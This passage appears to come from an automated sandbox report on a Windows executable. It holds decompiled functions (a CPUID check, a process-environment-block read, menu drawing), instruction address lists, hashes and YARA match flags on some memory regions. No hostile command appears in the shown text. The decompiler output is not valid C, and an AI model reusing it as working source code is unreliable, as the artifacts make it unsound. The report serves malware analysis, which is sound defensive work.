							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}































                  0x00429947
                  0x00429947
                  0x0042994d
                  0x004299c0
                  0x004299c2
                  0x004299c4
                  0x00000000
                  0x00000000
                  0x004299ca
                  0x004299d0
                  0x00429a4f
                  0x00429a51
                  0x00429a53
                  0x00000000
                  0x00000000
                  0x00429a59
                  0x00429a5f
                  0x00429ade
                  0x00429ae0
                  0x00429ae2
                  0x00000000
                  0x00000000
                  0x00429ae8
                  0x00429aee
                  0x00429b6d
                  0x00429b6f
                  0x00429b71
                  0x00000000
                  0x00000000
                  0x00429b7d
                  0x00429bfd
                  0x00429bff
                  0x00429c01
                  0x00000000
                  0x00000000
                  0x00429c07
                  0x00429c0d
                  0x00429c8c
                  0x00429c8e
                  0x00429c90
                  0x00000000
                  0x00000000
                  0x00429c96
                  0x00429c9c
                  0x00429d0d
                  0x00429d0f
                  0x00429d11
                  0x00429d13
                  0x00429d13
                  0x00429d15
                  0x0042aa71
                  0x0042aa71
                  0x00429ca5
                  0x00429ca7
                  0x00429cb8
                  0x00429cc0
                  0x00429cc2
                  0x00429cd3
                  0x00429cdb
                  0x00429cdd
                  0x00429cf2
                  0x00429cfa
                  0x00429cfc
                  0x00429d09
                  0x00429d09
                  0x00000000
                  0x00429cfc
                  0x00429ce6
                  0x00429cec
                  0x00000000
                  0x00000000
                  0x00429cee
                  0x00429cee
                  0x00000000
                  0x00429cee
                  0x00429ccb
                  0x00429cd1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429cd1
                  0x00429cb0
                  0x00429cb6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429cb6
                  0x00429c16
                  0x00429c18
                  0x00429c2f
                  0x00429c37
                  0x00429c39
                  0x00429c50
                  0x00429c58
                  0x00429c5a
                  0x00429c71
                  0x00429c79
                  0x00429c7b
                  0x00429c88
                  0x00429c88
                  0x00000000
                  0x00429c7b
                  0x00429c67
                  0x00429c6b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429c6b
                  0x00429c46
                  0x00429c4a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429c4a
                  0x00429c25
                  0x00429c29
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429c29
                  0x00429b87
                  0x00429b89
                  0x00429ba0
                  0x00429ba8
                  0x00429baa
                  0x00429bc1
                  0x00429bc9
                  0x00429bcb
                  0x00429be2
                  0x00429bea
                  0x00429bec
                  0x00429bf9
                  0x00429bf9
                  0x00000000
                  0x00429bec
                  0x00429bd8
                  0x00429bdc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429bdc
                  0x00429bb7
                  0x00429bbb
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429bbb
                  0x00429b96
                  0x00429b9a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429b9a
                  0x00429af7
                  0x00429af9
                  0x00429b10
                  0x00429b18
                  0x00429b1a
                  0x00429b31
                  0x00429b39
                  0x00429b3b
                  0x00429b52
                  0x00429b5a
                  0x00429b5c
                  0x00429b69
                  0x00429b69
                  0x00000000
                  0x00429b5c
                  0x00429b48
                  0x00429b4c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429b4c
                  0x00429b27
                  0x00429b2b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429b2b
                  0x00429b06
                  0x00429b0a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429b0a
                  0x00429a68
                  0x00429a6a
                  0x00429a81
                  0x00429a89
                  0x00429a8b
                  0x00429aa2
                  0x00429aaa
                  0x00429aac
                  0x00429ac3
                  0x00429acb
                  0x00429acd
                  0x00429ada
                  0x00429ada
                  0x00000000
                  0x00429acd
                  0x00429ab9
                  0x00429abd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429abd
                  0x00429a98
                  0x00429a9c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429a9c
                  0x00429a77
                  0x00429a7b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429a7b
                  0x004299d9
                  0x004299db
                  0x004299f2
                  0x004299fa
                  0x004299fc
                  0x00429a13
                  0x00429a1b
                  0x00429a1d
                  0x00429a34
                  0x00429a3c
                  0x00429a3e
                  0x00429a4b
                  0x00429a4b
                  0x00000000
                  0x00429a3e
                  0x00429a2a
                  0x00429a2e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429a2e
                  0x00429a09
                  0x00429a0d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429a0d
                  0x004299e8
                  0x004299ec
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042994f
                  0x0042994f
                  0x00429952
                  0x00429956
                  0x00429958
                  0x0042996b
                  0x0042996b
                  0x0042996f
                  0x00429973
                  0x00429975
                  0x00429988
                  0x00429988
                  0x0042998c
                  0x00429990
                  0x00429992
                  0x004299a5
                  0x004299a5
                  0x004299a9
                  0x004299ad
                  0x004299af
                  0x004299b5
                  0x004299b8
                  0x004299bc
                  0x004299bc
                  0x00000000
                  0x004299af
                  0x00429998
                  0x0042999b
                  0x0042999f
                  0x004299a3
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004299a3
                  0x0042997b
                  0x0042997e
                  0x00429982
                  0x00429986
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429986
                  0x0042995e
                  0x00429961
                  0x00429965
                  0x00429969
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429969
                  0x00429940
                  0x00429940
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction ID: 02d8d868b58e4d08d634cae864bce3e8c801d264febfcb148cc477add30e740c
                  • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction Fuzzy Hash: BBC192B3E0A9B30A8736812D605853BEEA26FD176076EC3E68CD43F38DD12A9D4195D4
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00522970, Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: d909e4edd0c35469dcd36e81c14f2c2f649a8c8e6389960df52b0641279cc1ce
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: 2F41B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 002C22AF, Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: fe32f3edfacaf7bd9adbe0b6f7dcd06a8681dcb57296a03c81204c6977a645b5
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: AB41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D734AB41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 002C0467, Relevance: .1, Instructions: 80COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction ID: 7ba0beb40df41ae386b3346759cfe7db60139674416066b8bc350a6a8b9117f7
                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction Fuzzy Hash: 7C319F3661474A8FC724DF18D4C0F2AB7E4FF88344F450AADE59587312D330E9168B91
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004F0E18, Relevance: .1, Instructions: 61COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.297130492.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_4f0000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction ID: 0451bc3f7085c55dd80b8021edb13407b45da67656bedde078cd860edbe13189
                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction Fuzzy Hash: 9E1170B23401049FDB54DF55DC81EB773EAEBC8320B29845AEE04CB312D679E802C760
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004093C0, Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  C-Code - Quality: 58%
                  			E004093C0(signed int __edx) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _t15;
				intOrPtr _t21;
				signed int _t31;
				void* _t32;

				_push(0xfffffffe);
				_push(0x445e20);
				_push(E00427FC0);
				_push( *[fs:0x0]);
				_t15 =  *0x44c364; // 0xa6e2bca1
				_v12 = _v12 ^ _t15;
				_push(_t15 ^ _t31);
				 *[fs:0x0] =  &_v20;
				_v28 = _t32 + 0xffffffec;
				_v32 = 0x800000;
				_v36 = 0;
				_v8 = 0;
				asm("cpuid");
				_v36 = __edx;
				_v8 = 0xfffffffe;
				if((_v36 & 0x00800000) == 0) {
					_t21 = 0;
				} else {
					_v8 = 1;
					asm("pxor mm0, mm0");
					asm("emms");
					_v8 = 0xfffffffe;
					_t21 = 1;
				}
				 *[fs:0x0] = _v20;
				return _t21;
			}













                  0x004093c3
                  0x004093c5
                  0x004093ca
                  0x004093d5
                  0x004093dc
                  0x004093e1
                  0x004093e6
                  0x004093ea
                  0x004093f0
                  0x004093f3
                  0x004093fa
                  0x00409401
                  0x0040940d
                  0x0040940f
                  0x00409412
                  0x00409443
                  0x0040947e
                  0x00409445
                  0x00409445
                  0x0040944c
                  0x0040944f
                  0x00409451
                  0x0040947a
                  0x0040947a
                  0x00409483
                  0x00409491

                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62f0d718f056e22e68c5245a076e8271a2bffbbef3574870f5ea1f41db7055fd
                  • Instruction ID: f136387efd5145fb582a75416f10b6cd11d69b61af36e65ba8ce89701aa617f2
                  • Opcode Fuzzy Hash: 62f0d718f056e22e68c5245a076e8271a2bffbbef3574870f5ea1f41db7055fd
                  • Instruction Fuzzy Hash: 1F0140B1908709DBCB10CF98CD41BDEFBB4FB45724F20826AE421A76D0D37959069A95
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00522860, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: c5910a3fe3934315d131e2795996df9cec5f9f5fe406650d67740f7896e745c2
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: 75019278E10219EFCB48DF98D5909AEFBB5FF89310F608599E809A7741D730AE41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00522800, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: 852107d55cec2bc02274fe481af1345a28a731c2358f99e94e2336a088162ab1
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: 85018078E04219EFCB48DF98D5909AEFBB5FF49310F208599E819A7341E730AE41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 002C213F, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: 8eca524bbff7ef7d6ef7583c13bec2c9ce79c0cd0d89afd824687c3f1b8869bb
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: FA018078A10109EFCB44DF98C590DAEF7B5FF48310B248699E909A7701DB30AE51DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 002C219F, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: 7335dee473d7aa6d1308b5b7905c2da32f120fbedb10214d1351a18a7ee788d2
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: BA019278A10109EFCB44DF98C590DAEF7B5FB48310F248699E919A7705DB70AE51DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 002C2C0C, Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction ID: f773f099e0f5c65842438b370e0be2afee82d0f17cf1c1a6f99e0dc617a9ed0f
                  • Opcode Fuzzy Hash: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction Fuzzy Hash: 8AE04F32330410CBC621DE99D580E69F3A5EB847B032A096ED54A93601CA60BD289A40
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00407F70, Relevance: .0, Instructions: 9COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00407F70(void* __ecx) {
				intOrPtr _v8;

				_v8 =  *[fs:0x30];
				return _v8;
			}




                  0x00407f7a
                  0x00407f83

                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                  • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                  • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                  • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 002C3743, Relevance: .0, Instructions: 3COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 0041FA76, Relevance: 40.7, APIs: 19, Strings: 4, Instructions: 401windowUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E0041FA76(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				int _t196;
				int _t200;
				intOrPtr _t208;
				intOrPtr* _t216;
				signed char _t224;
				signed char _t231;
				long _t266;
				long _t267;
				long _t313;
				long _t320;
				intOrPtr _t330;
				intOrPtr _t388;
				intOrPtr _t390;
				intOrPtr _t392;
				int _t393;
				intOrPtr* _t399;
				void* _t400;
				void* _t403;

				_t403 = __eflags;
				_t388 = __edx;
				E0042922B(E004394AE, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t400 - 0x34)) = __ecx;
				E00410F00(__ebx, _t400 - 0x30, __edi, __esi, _t403);
				_t390 =  *((intOrPtr*)(_t400 + 8));
				 *((intOrPtr*)(_t400 - 4)) = 0;
				_t399 = E00414668(0, _t400 - 0x30, _t390, __esi, _t403,  *((intOrPtr*)(_t390 + 0x18)));
				 *((intOrPtr*)(_t400 - 0x50)) =  *((intOrPtr*)( *_t399 + 0x1c))(0x43de78, 0xac);
				E004281D0(_t390, _t400 - 0xb8, 0, 0x30);
				 *(_t400 - 0xb8) = 0x30;
				 *((intOrPtr*)(_t400 - 0xb4)) = 0x40;
				 *(_t400 - 0x18) = 0;
				_t196 = GetMenuItemInfoW( *( *((intOrPtr*)(_t400 - 0x34)) + 4),  *(_t390 + 8), 0, _t400 - 0xb8);
				_t404 = _t196;
				if(_t196 != 0) {
					_t330 = E00405860(_t400 - 0x30, _t404,  *((intOrPtr*)(_t400 - 0x90)));
					 *((intOrPtr*)(_t400 - 0x90)) =  *((intOrPtr*)(_t400 - 0x90)) + 1;
					 *((intOrPtr*)(_t400 - 0x94)) = _t330;
					 *(_t400 - 0x18) = GetMenuItemInfoW( *( *((intOrPtr*)(_t400 - 0x34)) + 4),  *(_t390 + 8), 0, _t400 - 0xb8);
					E0040E100(0, _t400 - 0x30, _t390, 0xffffffff);
				}
				 *((intOrPtr*)(_t400 - 0x38)) =  *((intOrPtr*)(_t390 + 0x2c));
				E00415CDB(_t400 - 0x78, _t390 + 0x1c);
				_t392 =  *((intOrPtr*)(_t400 - 0x38));
				if(_t392 == 0 || E0041EF6A(_t392, ?str?) == 0) {
					 *(_t400 - 0x3c) = 0;
					_t393 = GetSystemMetrics(0x32);
					_t200 = GetSystemMetrics(0x31);
				} else {
					 *(_t400 - 0x3c) = 1;
					GetObjectW( *(_t392 + 4), 0x18, _t400 - 0x68);
					_t393 =  *((intOrPtr*)(_t400 - 0x60));
					_t200 =  *(_t400 - 0x64);
				}
				 *(_t400 - 0x1c) = _t200;
				asm("cdq");
				asm("cdq");
				_t208 = ( *((intOrPtr*)(_t400 - 0x6c)) -  *((intOrPtr*)(_t400 - 0x74)) - _t388 >> 1) - (_t393 - _t388 >> 1) +  *((intOrPtr*)(_t400 - 0x74)) - 1;
				 *((intOrPtr*)(_t400 - 0x20)) = _t393 + 1 + _t208;
				 *((intOrPtr*)(_t400 - 0x28)) = _t208;
				 *(_t400 - 0x2c) = 0;
				 *((intOrPtr*)(_t400 - 0x24)) =  *(_t400 - 0x1c) + 1;
				 *(_t400 - 0x1c) = GetSysColor(4);
				E004141D8(_t400 - 0x88);
				 *((char*)(_t400 - 4)) = 1;
				E004149F6(_t400 - 0x88, 0);
				 *((intOrPtr*)( *_t399 + 0x28))( *((intOrPtr*)(_t400 - 0x34)) + 8);
				_t216 = E0041AA1C(_t399, _t400 - 0x14, _t400 - 0x30);
				 *((intOrPtr*)(_t400 - 0x40)) =  *((intOrPtr*)(_t216 + 4));
				_t218 =  *((intOrPtr*)(_t400 + 8));
				 *((intOrPtr*)(_t400 - 0x44)) =  *_t216;
				if(( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x00000001) == 0) {
					E00421A9A(_t399, _t218 + 0x1c,  *(_t400 - 0x1c));
					 *((intOrPtr*)( *_t399 + 0x2c))( *(_t400 - 0x1c));
					_t224 =  *( *((intOrPtr*)(_t400 + 8)) + 0x10);
					__eflags = _t224 & 0x00000002;
					if((_t224 & 0x00000002) == 0) {
						__eflags =  *(_t400 - 0x3c);
						if( *(_t400 - 0x3c) != 0) {
							__eflags = _t224 & 0x00000008;
							if((_t224 & 0x00000008) != 0) {
								 *((intOrPtr*)(_t400 - 0x10)) =  *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28));
								 *((intOrPtr*)(_t400 - 0x34)) =  *((intOrPtr*)(_t400 - 0x24)) -  *(_t400 - 0x2c);
								_t266 = GetSysColor(0x14);
								_t267 = GetSysColor(0x10);
								__eflags =  *((intOrPtr*)(_t400 - 0x34)) + 1;
								E00421C5E(_t399,  *((intOrPtr*)(_t400 - 0x34)) + 1,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x34)) + 1,  *((intOrPtr*)(_t400 - 0x10)) + 1, _t267, _t266);
							}
						}
						__eflags =  *(_t400 - 0x18);
						if(__eflags == 0) {
							goto L25;
						} else {
							 *((intOrPtr*)( *_t399 + 0x2c))( *(_t400 - 0x1c));
							 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
							 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(7));
							goto L23;
						}
					}
					 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
					 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(0x14));
					E00413F50(_t399, 1);
					__eflags =  *(_t400 - 0x18);
					if(__eflags == 0) {
						goto L25;
					}
					asm("cdq");
					 *(_t400 - 0x18) =  *((intOrPtr*)(_t400 - 0x40)) - _t388;
					 *(_t400 - 0x18) =  *(_t400 - 0x18) >> 1;
					asm("cdq");
					E0041F86F(_t399,  *((intOrPtr*)(_t400 - 0x24)) + 4, ( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) -  *(_t400 - 0x18) +  *((intOrPtr*)(_t400 - 0x28)) + 1, 2, 0, _t400 - 0x30, 0);
					 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
					 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(0x11));
					_push(0);
					_push(_t400 - 0x30);
					_push(0);
					asm("cdq");
					_push(0);
					_push(( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) -  *(_t400 - 0x18) +  *((intOrPtr*)(_t400 - 0x28)));
					goto L24;
				} else {
					E00415CDB(_t400 - 0x60, _t218 + 0x1c);
					 *((intOrPtr*)(_t400 - 0x60)) =  *((intOrPtr*)(_t400 - 0x24)) + 2;
					E00421A9A(_t399, _t400 - 0x60, GetSysColor(0xd));
					if( *(_t400 - 0x3c) != 0 && ( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x0000000a) == 0) {
						 *((intOrPtr*)(_t400 - 0x34)) =  *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28));
						 *((intOrPtr*)(_t400 - 0x10)) =  *((intOrPtr*)(_t400 - 0x24)) -  *(_t400 - 0x2c);
						_t320 = GetSysColor(0x10);
						E00421C5E(_t399,  *((intOrPtr*)(_t400 - 0x10)) + 1,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x10)) + 1,  *((intOrPtr*)(_t400 - 0x34)) + 1, GetSysColor(0x14), _t320);
					}
					if( *(_t400 - 0x18) == 0) {
						L25:
						if( *(_t400 - 0x3c) == 0) {
							L32:
							 *((intOrPtr*)( *_t399 + 0x20))( *((intOrPtr*)(_t400 - 0x50)));
							 *((char*)(_t400 - 4)) = 0;
							E004146E5(_t400 - 0x88);
							return E00429303(E004055F0( *((intOrPtr*)(_t400 - 0x30)) + 0xfffffff0));
						}
						 *((intOrPtr*)(_t400 - 0x10)) = 0;
						 *((intOrPtr*)(_t400 - 0x14)) = 0x43ea08;
						_t231 =  *( *((intOrPtr*)(_t400 + 8)) + 0x10);
						 *((char*)(_t400 - 4)) = 2;
						_t417 = _t231 & 0x00000002;
						if((_t231 & 0x00000002) == 0) {
							__eflags = _t231 & 0x00000008;
							if(__eflags == 0) {
								L31:
								E004141D8(_t400 - 0x4c);
								 *((char*)(_t400 - 4)) = 3;
								E004149F6(_t400 - 0x4c, 0);
								E00414B47(_t400 - 0x4c,  *((intOrPtr*)(_t400 - 0x38)));
								InflateRect(_t400 - 0x2c, 0xffffffff, 0xffffffff);
								E004141A6(_t399,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x24)),  *((intOrPtr*)(_t400 - 0x20)), _t400 - 0x4c, 0, 0, 0xcc0020);
								 *((char*)(_t400 - 4)) = 2;
								E004146E5(_t400 - 0x4c);
								 *((char*)(_t400 - 4)) = 1;
								 *((intOrPtr*)(_t400 - 0x14)) = 0x43ea08;
								E00414B63(0, _t400 - 0x14, 0x43ea08, _t399, _t417);
								goto L32;
							}
							_push(0xffffff);
							_push( *(_t400 - 0x1c));
							_push(_t400 - 0x14);
							_push( *((intOrPtr*)(_t400 - 0x38)));
							E00414ED8(0, 0x43ea08, _t399, __eflags);
							L30:
							 *((intOrPtr*)(_t400 - 0x38)) = _t400 - 0x14;
							goto L31;
						}
						_push( *(_t400 - 0x1c));
